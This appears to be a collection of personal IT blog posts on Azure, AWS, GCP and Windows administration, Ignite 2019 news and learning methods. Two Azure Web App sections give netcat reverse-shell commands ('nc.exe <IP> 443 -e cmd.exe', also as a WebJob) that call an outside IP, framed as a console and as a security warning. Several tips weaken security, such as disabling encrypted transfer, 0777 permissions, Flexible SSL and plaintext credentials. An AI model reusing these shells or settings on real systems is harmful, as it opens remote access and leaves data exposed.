
DevExpress – Incorrect route to ASPxUploadProgressHandlerPage.ashx

If you encounter this error:

System.Exception

Incorrect route to ASPxUploadProgressHandlerPage.ashx. Please use the IgnoreRoute method to ignore this handler’s route when processing requests.

Please edit the RouteConfig.cs file, adding:

routes.IgnoreRoute("{resource}.aspx/{*pathInfo}");
routes.IgnoreRoute("{resource}.asmx/{*pathInfo}");
routes.IgnoreRoute("{resource}.ashx/{*pathInfo}");


Please do not forget to add this to your Layout file:


@Html.DevExpress().GetStyleSheets(
    new StyleSheet { ExtensionSuite = ExtensionSuite.NavigationAndLayout },
    new StyleSheet { ExtensionSuite = ExtensionSuite.Editors }
)

@Html.DevExpress().GetScripts(
    new Script { ExtensionSuite = ExtensionSuite.NavigationAndLayout },
    new Script { ExtensionSuite = ExtensionSuite.Editors }
)


Linux Azure Files mount problem

In the case of:

mount error(13): Permission denied

or

mount error(16): Device or resource busy

your kernel probably does not support CIFS encryption, so please disable “Secure transfer required” on the storage account.

And use this command:

sudo mount -t cifs //STORAGEACCOUNTNAME.file.core.windows.net/SHARENAME /mnt -o vers=2.1,username=STORAGEACCOUNTNAME,password=YOUR_STORAGE_ACCOUNT_KEY==,dir_mode=0777,file_mode=0777,sec=ntlmssp

Unencrypted transfers work only when your VM is in the same region as the storage account.
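
In the mount command, the username is the storage account name and the password is one of the storage account keys. A sketch for fetching the key with Az PowerShell (the resource group and account names below are placeholders):

# Fetch the first storage account key to use as the CIFS password
Get-AzStorageAccountKey -ResourceGroupName "my-rg" -Name "storageaccountname" |
    Select-Object -First 1 -ExpandProperty Value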

If you receive something like this:

mount: wrong fs type, bad option, bad superblock on

you need to install cifs-utils:

sudo apt install cifs-utils

Troubleshooter:

https://gallery.technet.microsoft.com/Troubleshooting-tool-for-02184089

Magento install on Azure WebApp + Azure Database for MariaDB/MySQL server

If you try to install Magento the usual way on a Microsoft Azure Web App using MariaDB or MySQL, you will probably receive an error:

 

[ERROR] Magento\Eav\Model\Entity\Attribute\Exception: Warning: SessionHandler::read(): Session data file is not created by your uid in /home/site/wwwroot/vendor/magento/framework/Session/SaveHandler/Native.php on line 22 in /home/site/wwwroot/vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php:121Stack trace:#0 /home/site/wwwroot/vendor/magento/framework/ObjectManager/Factory/Dynamic/Developer.php(66): Magento\Framework\ObjectManager\Factory\AbstractFactory-

 

The solution is quite simple: during installation, select storing sessions in the database instead of files. After installation you can move them to Redis, or back to files by adding:

session.save_handler = files

session.save_path = "var/www/magento2/var/session"

 

to the .user.ini file.

 

The next error you may see is connected with a DB permission:

General error: 1419 You do not have the SUPER privilege and binary logging is enabled

The solution is quite simple: set log_bin_trust_function_creators to ON in the server parameters in the Azure Portal.
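
If you prefer to script it, something like this should work with the optional Az.MySql module (a sketch; the resource group and server names are placeholders):

# Requires the Az.MySql module: Install-Module Az.MySql
# Set the server parameter without opening the portal
Update-AzMySqlConfiguration -ResourceGroupName "my-rg" -ServerName "my-mysql-server" -Name "log_bin_trust_function_creators" -Value "ON"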

 

GCP App Engine via Cloudflare – Step by Step

It is usually wise to protect your application against DDoS, XSS, SQL injection and so on. Unfortunately, at this moment it is impossible to use Google Cloud Armor with Google App Engine. One solution is to use Azure Application Gateway with WAF, or Cloudflare. How to configure Cloudflare with App Engine, step by step:

  1. As usual, you must delegate your DNS zone to Cloudflare – the process is easy after you register with Cloudflare.
  2. In the Google Cloud Console, go to the App Engine panel, then Settings and Custom domains, and add a Custom Domain.
  3. You need to verify the new domain by adding a TXT record to your DNS settings. You do this in Cloudflare. Please remember that if you are adding a subdomain, e.g. cc.wiadki.pl, you need to add the TXT record for the subdomain cc.wiadki.pl.
    If you have a problem with it, you can switch to adding a CNAME record instead. That worked better for me.
  4. After verifying the domain, Google will create an SSL certificate for it, but it does not work with Cloudflare at this moment, so you need to disable SSL security like here:

  5. Now you can add the A records in Cloudflare:

    You can also add IPv6 addresses.

  6. During my tests, Full end-to-end encryption did not work for me, so go to the SSL/TLS settings and select Flexible mode – like here:

    If you want to use Flexible mode for only one subdomain, you can do it using Page Rules, like here:

    This way, only cc.wiadki.pl will be without end-to-end encryption.

  7. You can also use the Always Use HTTPS option to redirect from HTTP to HTTPS, using Page Rules like here:

    Or for all entries in your domain, in the SSL/TLS – Edge Certificates settings:

     

    For some time you can visit and test how this App Engine page works through the Cloudflare proxy:

    https://cc.wiadki.pl/

     

     

    After you enable Cloudflare for App Engine, please remember that App Engine will still be available at its *.appspot.com address, so protect it using a client certificate, a reverse connection, or at least an IP restriction to Cloudflare's ranges: https://www.cloudflare.com/ips/.

     

    More info:

    https://support.cloudflare.com/hc/en-us/articles/200170166-Best-Practices-DDoS-preventative-measures

     

     

     

Certificate-based authentication for Azure

The best way to authenticate to Azure from an application is to use Managed Identity. But sometimes that is not possible (e.g. on-premises), and then certificate-based authentication is more secure than a secret (password).

Here is a quick manual:

#Create Certificate
New-SelfSignedCertificate -Subject "CN=CertForMyApp" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature
#Export Certificate from Store (mmc command)
#Create App registrations (portal.azure.com)
#Upload Certificate (portal.azure.com)
#Assign Permission (portal.azure.com)
#Check local Certificates
Get-ChildItem Cert:\ -Recurse|Select-String C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318
#Connect to Azure
Connect-AzAccount -ApplicationId f3ac2214-e37b-4f3e-9023-29abad27c8 -Tenant e9823fe4-675d-4843-a547-4154fc131c -CertificateThumbprint C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318
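
If you prefer to stay in PowerShell instead of mmc for the export step, here is a sketch (the thumbprint is the one from above; the PFX password is a placeholder):

# Export the public certificate (.cer) for upload to the App registration
Export-Certificate -Cert "Cert:\CurrentUser\My\C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318" -FilePath "$env:TMP\CertForMyApp.cer"
# Export the certificate with its private key (.pfx) for use on another machine
$pfxPassword = ConvertTo-SecureString -String "ChangeMe!" -Force -AsPlainText
Export-PfxCertificate -Cert "Cert:\CurrentUser\My\C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318" -FilePath "$env:TMP\CertForMyApp.pfx" -Password $pfxPassword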

How to create Custom Read-Write role for Blob Storage in Azure

The best way is to use PowerShell Cloud Shell. Prepare environment:

cd \home
mkdir workingdir
cd workingdir

Write existing role to JSON format:

Get-AzRoleDefinition -Name "Storage Blob Data Contributor" | ConvertTo-Json | Out-File ReadWriteRole.json

Edit the file (set IsCustom to true, put the correct subscription in AssignableScopes, delete unnecessary actions, and give it a new Name and Description; the Id is not important):

vi ReadWriteRole.json

{
  "Name": "Custom Role Storage Blob Read Write",
  "Id": "ba92f5b4-2d11-453d-a403-e96b0029c9fe",
  "IsCustom": true,
  "Description": "Custom Role Allows for read, write access to Azure Storage blob containers and data",
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read",
    "Microsoft.Storage/storageAccounts/blobServices/containers/write",
    "Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action"
  ],
  "NotActions": [],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read",
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write"
  ],
  "NotDataActions": [],
  "AssignableScopes": [
    "/subscriptions/4b1caf79-6e4c-49d-8160-5853298"
  ]
}

Save and exit by pressing Escape, then typing :wq and Enter.

Add New Custom Role:

New-AzRoleDefinition -InputFile ReadWriteRole.json

Display All Custom Roles:

Get-AzRoleDefinition | ? {$_.IsCustom -eq $true} | FT Name, IsCustom

And now you can use the new Custom Role in the Portal.
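
To actually grant the role, a hedged assignment sketch (the user and scope below are placeholders):

# Assign the new custom role to a user at a storage account scope
New-AzRoleAssignment -SignInName "user@contoso.com" -RoleDefinitionName "Custom Role Storage Blob Read Write" -Scope "/subscriptions/<subscription-id>/resourceGroups/<rg>/providers/Microsoft.Storage/storageAccounts/<account>"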

Reverse shell from Azure Web App via Web Hook

In this article I present the idea of running NetCat in a Web App and getting shell access this way. If you need it to work repeatedly, this solution can be more convenient. Just create a start.bat like this:

d:\home\site\wwwroot\nc.exe 40.113.139.194 443 -e cmd.exe

and upload it as a WebJob to the Web App.

You can then invoke it at any time and establish a connection to the shell:

$username = "`$webapprg09"
$password = "vzcXNeXmoltECLoALtLrYeincorect"
$base64AuthInfo = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(("{0}:{1}" -f $username, $password)))
$userAgent = "powershell/1.0"
$apiUrl = "https://webapprg09.scm.azurewebsites.net/api/triggeredwebjobs/reverse/run"
Invoke-WebRequest -Uri $apiUrl -Headers @{Authorization=(“Basic {0}” -f $base64AuthInfo)} -UserAgent $userAgent -Method POST -Debug

First, you need to start the listener on your server using:

netcat -l -p 443

Reverse shell to your WebApp – Console to Azure WebApp from your text environment like bash

As far as I remember, you can get console access to your Azure Web App via a web browser – via Kudu Console or via App Service Editor, where you can also upload files. It looks like this:

But it is not always convenient to use it via a web browser, especially when you are working on a poor internet connection or would like to monitor logs.

You can use netcat to establish a connection from the Web App to your workstation. Here is how to do it.

On the machine where you want to use the text console, install netcat using:

apt-get -y install netcat

and start waiting for the incoming connection. In this example, we will use port 443.

netcat -l -p 443

In your Web App upload nc.exe (source https://eternallybored.org/misc/netcat) and run it:

nc.exe 40.113.139.194 443 -e cmd.exe

Please be aware that Windows 10 treats nc.exe as unwanted software, so after unzipping it you have only a few seconds to upload it to the Web App.

What is it for?

The main reason for this blog post is that a Web App can be used as an entry point to your infrastructure and should be protected. Similar code can be run from your Web App via the web and establish a reverse shell. It can be especially dangerous when your Web App is connected to your private Virtual Network – this way, an attacker can move from your Web App into your Virtual Machine environment.

The cloud is always a Shared Responsibility model – you are also responsible for securing your environments, scanning for unwanted files, and filtering egress and ingress traffic, which is possible in an App Service Environment or via Application Gateway.

SQL Server Software Assurance Licensing Benefits for Disaster Recovery

If a customer is on-premises, then they get the following with Software Assurance for every core that is deployed on the primary:

  • One free passive core for HA or DR on-premises;
  • One free passive core for DR (async replication only);
  • One free passive core for DR on SQL Server on Azure VM (async replication only).

 

If a customer is on Azure VM, then they get the following with Software Assurance for every core that is deployed on the primary:

  • One free passive core for HA or DR on Azure VM;
  • One free passive core for DR on Azure VM (async replication only).

 

Passive SQL Server Instance – the following operations are allowed on a passive secondary:

  • Database consistency — Maintenance operation;
  • Log Backups;
  • Full Backups;
  • Monitoring applications can connect and gather data.

News from the last quarter of 2019 in the field of Azure Active Directory

Successor of Azure AD Connect: Azure AD Connect cloud provisioning

https://docs.microsoft.com/en-us/azure/active-directory/cloud-provisioning/what-is-cloud-provisioning

Azure AD authentication to Windows VMs

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-authentication-to-windows-vms-in-azure-now-in-public/ba-p/827840

Conditional Access report-only mode

Evaluate impacts of new policies before rolling them out across the entire organization.

Monitor impact with Azure Monitor and the new Conditional Access Insights workbook.

News in Identity Protection

  • Added and enhanced signals
  • New detections
  • Improved APIs
  • New user interface
  • Azure Sentinel integration

https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection

Security Defaults

Preconfigured security settings for common attacks

Basic level of security at no extra cost

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults

New built-in roles in Azure AD

  • Global reader
  • Authentication admin
  • Privileged authentication admin
  • Azure DevOps admin
  • Security operator
  • Several B2C roles
  • Group admin
  • Office apps admin
  • Compliance data admin
  • External identity provider admin
  • Kaizala admin
  • Message center privacy reader
  • Password admin
  • Search admin
  • Search editor

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/16-new-built-in-roles-including-global-reader-now-available-in/ba-p/900749

https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#available-roles

Azure AD entitlement management

  • Govern employee and partner access at enterprise scale
  • Automate employee and partner access requests, approvals, auditing and review

https://docs.microsoft.com/en-us/azure/active-directory/governance/entitlement-management-overview

Admin consent workflow

Admin consent workflow – gives end users a way to request access to applications that require admin consent.

Without an admin consent workflow, a user in a tenant where user consent is disabled will be blocked when they try to access any app that requires permissions to access organizational data.

  • Users can request access when user consent is disabled
  • Users can request access when apps request permissions that require admin consent
  • Gives admins a secure way to receive and process access requests
  • Users are notified of admin action

https://aka.ms/adminconsentworkflow/

Secure legacy apps with app delivery controllers and networks

  • Simplify secure access to on-premises legacy-auth based apps
  • Access apps that use Kerberos, header-based auth, form-based auth, LDAP, NTLM, RDP, SSH
  • F5, Citrix, Akamai, ZScaler
  • Allow use of conditional access and passwordless auth with on-prem apps

https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/secure-hybrid-access

Migrate to cloud authentication by using staged rollout

Configure groups of users to use cloud authentication instead of federation

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-staged-rollout

Passwordless security key sign in to on-premises resources

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/replace-passwords-with-a-biometric-security-key/ba-p/827844

Forest trust to an on-premises domain in Azure Active Directory Domain Services

https://docs.microsoft.com/en-us/azure/active-directory-domain-services/tutorial-create-forest-trust

Microsoft identity platform authentication libraries updates

https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-v2-libraries

Direct federation with AD FS and third-party providers for guest users

https://docs.microsoft.com/pl-pl/azure/active-directory/b2b/direct-federation

Tutorials for integrating SaaS applications with Azure Active Directory

https://docs.microsoft.com/azure/active-directory/saas-apps/tutorial-list

 

AWS Fargate Cluster coexistence with EC2 instances / Autoscaling Capacity Providers

It is possible to add Capacity Providers with Auto Scaling EC2 instances to your AWS Fargate cluster. You can use this to debug some containers – you can just log in to the EC2 instance where your container is running – or to optimize the mix of EC2 / Fargate instances, especially when you use reserved EC2 instances.

When you add Auto Scaling EC2 instances directly as Capacity Providers, you can receive errors like these:

unable to place a task because no container instance met all of its requirements

or

No Container Instances were found in your cluster

The trick: when you create the Launch Configuration, select a Community AMI such as amzn2-ami-ecs-hvm-2.0.20191212-x86_64-ebs – of course, choose the latest one.

Also choose the IAM role ecsInstanceRole and, most importantly, provide this user data:

#!/bin/bash
# Register this instance with the ECS cluster (cluster name from this article)
echo ECS_CLUSTER=LastFinal >> /etc/ecs/ecs.config
# Block containers from reaching the EC2 instance metadata endpoint
sudo iptables --insert FORWARD 1 --in-interface docker+ --destination 169.254.169.254/32 --jump DROP
sudo service iptables save
echo ECS_AWSVPC_BLOCK_IMDS=true >> /etc/ecs/ecs.config

After you create the Auto Scaling group, your instances should come to life and you should see them in your Fargate cluster:

Now you can add the Capacity Provider; Managed termination protection should be disabled.

And now you can run your Tasks with either the Fargate or the EC2 launch type. Please remember that the Task must be compatible with EC2.

Launch command line:

aws ecs create-service --capacity-provider-strategy capacityProvider=EC2CapacityProvider,weight=1 --cluster LastFinal --service-name shellexample --task-definition shell:2 --desired-count 1 --network-configuration "awsvpcConfiguration={subnets=[subnet-068457290b918bf38],securityGroups=[sg-0563e9b190a2ccf65]}"

This member is waiting for initial replication for replicated folder SYSVOL Share and is not currently participating in replication.

This is similar to the FRS (File Replication Service) reinitialization problem described, for example, here: https://support.microsoft.com/en-us/help/290762/using-the-burflags-registry-key-to-reinitialize-file-replication-servi

 

But we need to do it for DFS-R. Quick steps:

 

  1. On the source domain controller, stop the DFS Replication service.
  2. Open ADSI Edit and set msDFSR-Enabled to False (see the PowerShell sketch after this list), here:


     

  3. Set msDFSR-Options to 1.


  4. Do:

    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

     

  5. On all other Domain Controllers, open ADSI Edit and set msDFSR-Enabled to False, here:


  6. repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  7. Start the DFS Replication service.
  8. Open ADSI Edit and set msDFSR-Enabled to True on the primary Domain Controller.
  9. Issue DFSRDIAG POLLAD
    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  10. On every Domain Controller, open ADSI Edit and set msDFSR-Enabled to True.
  11. Issue DFSRDIAG POLLAD
    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  12. Now replication of SYSVOL should work again.
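
Instead of clicking through ADSI Edit at each step, the msDFSR-Enabled attribute can also be flipped from PowerShell. A sketch, assuming a DC named DC1 in contoso.com (adjust the distinguished name to your environment):

Import-Module ActiveDirectory
# The SYSVOL subscription object lives under each DC's computer object
$dn = "CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DC1,OU=Domain Controllers,DC=contoso,DC=com"
# Set to $false to disable, $true to re-enable
Set-ADObject -Identity $dn -Replace @{ "msDFSR-Enabled" = $false }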

Migrating Existing RDS environment to Windows Desktop in Azure

This is a Hands-On Lab recording from Microsoft Ignite 2019. You can migrate not only existing Remote Desktop hosts but also VDI solutions. The script used in this lab:

Install-Module -Name Microsoft.RDInfra.RDPowerShell
$tenant = "HOLVDI"
$hostpoolname = "rg982109-p"
Add-RdsAccount -DeploymentUrl "https://rdbroker.wvd.microsoft.com"
New-RdsHostPool -TenantName $tenant -Name $hostpoolname
New-RdsRegistrationInfo -TenantName $tenant -HostPoolName $hostpoolname -ExpirationHours 4 | Select-Object -ExpandProperty Token > "$env:PUBLIC\Desktop\token.txt"
Add-RdsAppGroupUser -TenantName $tenant -HostPoolName $hostpoolname -AppGroupName "Desktop Application Group" -UserPrincipalName "user982109@cloudplatimmersionlabs.onmicrosoft.com"
Set-RdsRemoteDesktop -TenantName $tenant -HostPoolName $hostpoolname -AppGroupName "Desktop Application Group" -FriendlyName "WS 2019"
#Install Agents
#https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWrmXv
#https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWrxrH
Get-RdsSessionHost -TenantName $tenant -HostPoolName $hostpoolname
#aka.ms/wvdweb
New-RdsAppGroup -TenantName HOLVDI -HostPoolName $hostpoolname -Name Wordpad -ResourceType RemoteApp
Get-RdsStartMenuApp -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad
Get-RdsStartMenuApp -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad | ? {$_.FriendlyName -match "Wordpad"}
New-RdsRemoteApp -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad -Name Wordpad -Filepath "C:\Program Files\Windows NT\Accessories\wordpad.exe" -IconPath "C:\Program Files\Windows NT\Accessories\wordpad.exe"
Get-RdsRemoteApp -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad
Add-RdsAppGroupUser -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad -UserPrincipalName "user982109-1@cloudplatimmersionlabs.onmicrosoft.com"
#aka.ms/wvdweb

Before you start, please do the following (if you do not, you will receive: Add-RdsAccount: One or more errors occurred. or New-RdsHostPool: User is not authorized to query the management service.):

Add permissions by opening these links:

  1. https://login.microsoftonline.com/common/adminconsent?client_id=5a0aa725-4958-4b0c-80a9-34562e23f3b7&redirect_uri=https%3A%2F%2Frdweb.wvd.microsoft.com%2FRDWeb%2FConsentCallback
  2. wait a minute
  3. https://login.microsoftonline.com/common/adminconsent?client_id=fa4345a4-a730-4230-84a8-7d9651b86739&redirect_uri=https%3A%2F%2Frdweb.wvd.microsoft.com%2FRDWeb%2FConsentCallback
  4. wait a minute
  5. Open Azure Active Directory, Enterprise applications – Windows Virtual Desktop – Users and groups, and add the TenantCreator role to your user.
    Start the script.
  6. Issue:

    New-RdsTenant -Name $tenant -AadTenantId <Azure Active Directory Tenant ID> -AzureSubscriptionId <Subscription Id>

  7. wait a minute and issue:

    New-RdsRoleAssignment -RoleDefinitionName "RDS Owner" -SignInName "mf@specsourcecom.onmicrosoft.com" -TenantGroupName "Default Tenant Group" -TenantName $tenant

More info here.

Ignite 2019 Hall Of Fame – Most Valuable Professional and Regional Directors

As usual during the Microsoft Ignite conference, the blue stands listed all Most Valuable Professionals and the black stands all Microsoft Regional Directors.

Microsoft Most Valuable Professionals, or MVPs, are technology experts who passionately share their knowledge with the community.
Microsoft Regional Directors are more business-focused than MVPs; they are independent technology enthusiasts who engage with and evangelize one or more Microsoft technologies in a region.

If you have a question, need advice, or have a problem to solve, you can always count on the help of Microsoft Most Valuable Professionals or Microsoft Regional Directors.

So here is the complete list of Most Valuable Professionals from Microsoft Ignite 2019 – if you are an MVP or RD, you can find yourself on it.

A few more pictures from the List of Glory:

 

Learning Pyramid – how to learn and teach others effectively

Back in the day, a colleague of mine, a Microsoft Certified Trainer, used to say: if you want to learn a technology, run a training course on it. At the time I was at the beginning of my trainer path (which, by the way, I never committed to 100%) and I did not fully agree with that statement. Still, one has to admit there is something to it – by teaching others, especially adults, and facing all kinds of questions, we become experts in a given topic.

 

During the Microsoft Ignite 2019 conference – or, more precisely, during the day organized for Microsoft Certified Trainers – the topic of effective teaching, especially of adults, came up. Research results and the so-called Learning Pyramid were presented. Until then, since my student days, I had known Maslow's Pyramid of Needs (hierarchy), which, by the way, also makes a reference to learning.

Maslow's Pyramid

Getting to the point, the aforementioned Learning Pyramid tells us about learning effectiveness – that is, which learning methods are the most effective:

Learning Pyramid

 

Bearing the above research in mind, the most effective form of learning is trying to teach others – although, let's be honest, if we are "green" in a topic it is hard to start teaching it. However, once we have some knowledge, we can organize courses for those who are "green" in the topic, and in this way we develop ourselves in it.

I will not dwell on the individual levels of the pyramid, because it is a collection of seemingly obvious things. The best learning is through practice – if we build or deploy something, we will certainly learn it. Likewise, seeing how something actually works (a demo) gives more than just reading about it. Discussing it gives even more.

What surprises me in this study is the Audio/Video level – that is, it is more valuable than reading. It is worth remembering this when we tell a child "turn off YouTube and read something" – I am deliberately not touching on the values presented by some YouTubers here.

Coming back to the IT market, which I am connected with, it struck me that some people and companies – probably without knowing this research – started to implement this learning scenario, a practical application of the Learning Pyramid. Undoubtedly the leader on the Polish market was Robert Stuczynski with the Virtual Study project, where IT training materials were and still are published – by the way, it is a goldmine of knowledge about historical systems such as Lotus Notes. That was an implementation of level 3 – Audio/Video – but it lacked the further levels, which are covered by the products mentioned below.

Mirosław Burnejko went the furthest: based on discussions and presentations of his life path, he built a company from scratch and achieved amazing success within two years – I mean Chmurowisko. Mirek himself went further still and is implementing the last level – this time of Maslow's Pyramid – wanting to inspire others to implement the Pyramid from level 3 onwards; I mean Fabryka Kursów, where he teaches how to earn money on courses.

Browsing the Internet, and participating in the so-called community, more people are successfully running further training ventures under much the same banner – for example, Michał Furmankiewicz seems to have taken over the management of https://szkolachmury.pl/, where new courses that the market is practically waiting for keep appearing; I mean Kubernetes and Google Cloud here.

I am very curious about the last product – seemingly for the most advanced users, and certainly created by experts who must have broken a few keyboards deploying one YAML after another to Kubernetes. I mean Łukasz Kałużny, accompanied by Jakub Gutkowski and Piotr Stapp, with https://poznajkubernetes.pl/ – by the way, the most professional website of them all.

I almost forgot about Maciej Aniserowicz – https://edu.devstyle.pl/ – whose courses are the most popular and have achieved the greatest success; and new ones are about to appear.

 

As for professional training companies, the ABC DATA – Action training center (now Cloud Team) also offered Audio/Video courses – but I dare say they did not really catch on, although during classroom trainings all the techniques from the Pyramid above are successfully used. Altkom Akademia, in addition to the above, engages attendees in post-training discussions, where they can ask questions and answer them, and in this way implements the last level of the Pyramid.

All in all, you could say that everyone is implementing the Learning Pyramid strategy – for the good of the IT market's development. I sometimes wonder whether and when the market will become saturated, but looking at the demand for IT specialists, it will not happen soon.

Before I forget: I am active in this field myself, and I invite you to my courses.

 

Mariusz Ferdyn

 

PS: If I did not mention someone, it is purely an oversight. I am not advertising the companies or courses above; investing in knowledge is the best investment, but think it over before buying, especially on Black Friday and Cyber Monday – even though everyone offers a money-back guarantee if you are not satisfied.

 

Continuously upload files to FTP using PowerShell

Sometimes we need to continuously upload files from a local disk to FTP. We can do it using the following PowerShell script:

# Requires NetCmdlets (provides Send-FTP)
Import-Module NetCmdlets
while ($true) {
    # Create a temporary staging directory
    New-Item c:\wgrywam -ItemType Directory | Out-Null
    # Move files not written to for at least 3 minutes into the staging directory
    Get-ChildItem C:\CB08 -Recurse | ? { $_.LastWriteTime -le (Get-Date).AddMinutes(-3) } | % { Move-Item $_.FullName c:\wgrywam }
    # Upload everything from the staging directory
    Get-ChildItem C:\wgrywam -Recurse | % { Send-FTP -Server ftp.pol.pl -User uzytkownik -Password haslo -LocalFile $_.FullName -RemoteFile $_.Name }
    # Remove the staging directory and pause before the next pass
    Remove-Item -Recurse -Force c:\wgrywam
    Start-Sleep -Seconds 60
}

This script creates a temporary directory c:\wgrywam and moves into it all files from C:\CB08 (recursively) that have not been written to for 3 minutes. It then connects to ftp.pol.pl using the username uzytkownik and password haslo and uploads all files from the temporary directory. Finally, it removes the temporary directory and waits before the next pass.

To use this, you need to install NetCmdlets from here.

How Azure can help you with performance tests using JMeter

This article is mainly dedicated to attendees of the http://www.jstalks.net/ conference. You can use it even if you did not attend, but it will probably require more engagement from you to follow the flow.

During this session, you will learn how to use Azure for performance testing with JMeter. With a simple script, you will launch ~10 VMs with JMeter installed, ready to start your performance test. We will also create a simple test plan and test your site.

JMeter – fast track to install it:

  • Java 64bit (!!! – all java downloads) Windows Offline (64-bit)
    • https://javadl.oracle.com/webapps/download/AutoDL?BundleId=240728_5b13a193868b4bf28bcb45c792fce896
  • https://archive.apache.org/dist/jmeter/binaries/apache-jmeter-5.1.1.tgz

Just after that it will work, but for better performance several tweaks are needed in the jmeter.properties and jmeter.bat files (the original screenshots compared the final settings with the defaults; all modified files are linked at the end of this article, so you can copy and paste).

JMeter – Test scenario:

The next step is to launch jmeter.bat and create your first test scenario. Some links on how to do it:

  • https://jmeter.apache.org/usermanual/build-web-test-plan.html
  • https://octoperf.com/blog/2018/03/29/jmeter-tutorial/

But do not waste time with the links above – take the sample plan (rzetelnekursy), modify it with copy and paste, and go ahead with your first test.

JMeter – distribute tests across servers:

https://jmeter.apache.org/usermanual/jmeter_distributed_testing_step_by_step.html

But do not waste time with the manual steps – just create a Virtual Machine Scale Set with the desired number of VMs. You can use cheap Low Priority VMs for that. To install Apache JMeter, use this cloud-init script:

cloud_init

BTW: you can use this to install JMeter on any Linux machine – just copy and paste it on your workstation or in any other cloud.

Reconfigure the server to launch tests on slaves:

user.properties file:

  • http.connection.stalecheck$Boolean=true
  • server.rmi.ssl.disable=true

jmeter.properties file (see the modified files at the end for the desired values):

Also make sure communication with the server on port 1099 is allowed, or just disable the firewall on the server.

And now you can start your distributed tests.
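
A sketch of kicking off a distributed run from the controller (assuming your plan is saved as testplan.jmx; -n is non-GUI mode and -r starts all engines listed in remote_hosts):

# Run the test plan on all remote slaves defined in remote_hosts
.\jmeter.bat -n -t .\testplan.jmx -r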

Debug

tail -f /root/apache-jmeter-5.1.1/bin/jmeter-server.log

“java.rmi.ConnectException: Connection refused to host: 10.0.0.6; nested exception is” – solution:

  • Check communication, firewall, etc.
  • Use names instead of IPs – you can use http://ssl4ip.westeurope.cloudapp.azure.com/

    Like this: remote_hosts=10-0-0-4.h.com.pl,10-0-0-5.h.com.pl,10-0-0-7.h.com.pl

  • In the jmeter.bat file:

    set rmi_host=-Djava.rmi.server.hostname=10.0.0.6

    then add %rmi_host% at the end of the set ARGS= line.

All config files used in this article:

allmodifiedfiles

Official: BOOK OF NEWS, Microsoft Ignite 2019, Orlando, November 4-8, 2019

BOOK OF NEWS Microsoft Ignite 2019:

Ignite2019BookofNews.pdf

Azure News from Microsoft Ignite 2019 – 3 minutes read Mariusz’s bullet list

Here is a list of new Azure features announced during Ignite 2019 that, in my opinion, you should learn more about.

This is not a complete list – just the ones I noticed, and it is only for Azure. Some of them may have been announced earlier.

 

Virtual Machines:

  • New Sizes Daav4, Eav4, NVv4, NDv2
  • OS Disk Size 2TB+, 12 TB RAM (VM Gen2)
  • Reservation – pay by month.

 

Virtual Machine Scale Set:

  • Different Sizes of VMs in Scale Set;
  • Faster provisioning of custom images.

 

Containers, Kubernetes:

  • Azure Availability Zones;
  • Different Sizes of VMs;
  • API – security with authenticated IP;

 

Azure Containers Instances:

  • GA – Windows 2019 based containers;
  • Windows Container in your Vnet.

 

 

Azure Arc, Azure, Azure Resource Manager:

  • Single Control Plane for any resource anywhere.

 

Azure Migrate:

  • Assessment for Not Virtualized Environment;
  • CSV import-based discovery;
  • Dependency Mapping without installing Agent;
  • Web App migration;
  • Virtual Desktop migration;
  • GA – Agentless migration for VMware.

 

Functions:

  • .net Core 3.0 (Preview);
  • Support Python 3.7;
  • Durable Functions 2.0;
  • Azure Monitor – Logs;
  • PowerShell support GA;
  • Premium Functions – GA.

 

API Management:

  • Developer Portal – GA;
  • ARC API Management Gateway – Public Preview.

 

App Service:

  • App Services Certificate – Multiple cert for multiple hostnames

 

IoT Central:

  • App Templates for Industries;
  • Azure Time Series Insights;
  • Azure Maps;
  • Power BI Integration;
  • AccuWeather integration;
  • Plug & Play;
  • Preview Maps private indoor mapping.

 

Azure Firewall Manager – Public Preview

 

Azure Stack:

  • Azure Stack is now Azure Stack HUB, and we have also Azure Stack Edge and Azure Stack HCI

 

Azure Stack Hub:

  • Cloud-Init
  • Event Hubs
  • Kubernetes Clusters
  • Windows Virtual Desktop – Private Preview

Converting GUI settings to the registry and then to PowerShell commands

When deploying Infrastructure as Code solutions, we very often use the so-called Custom Script Extension, in which we write a PowerShell script that runs when the virtual machine is created. For Windows machines, we usually need to modify the registry to set the appropriate properties of the virtual machine.

Windows has accustomed us to clicking through the options we need, which in fact are registry changes – and this applies not only to operating system settings but also to, for example, Office. So how do we quickly convert settings clicked in the GUI into a PowerShell script?

  1. Download software that compares the registry before and after a change (https://www.nirsoft.net/utils/registry_changes_view.html).
  2. Run the software and take a snapshot before making the changes in the GUI.
  3. Make the changes in the GUI.
  4. Compare the registry snapshot with the current registry entries.
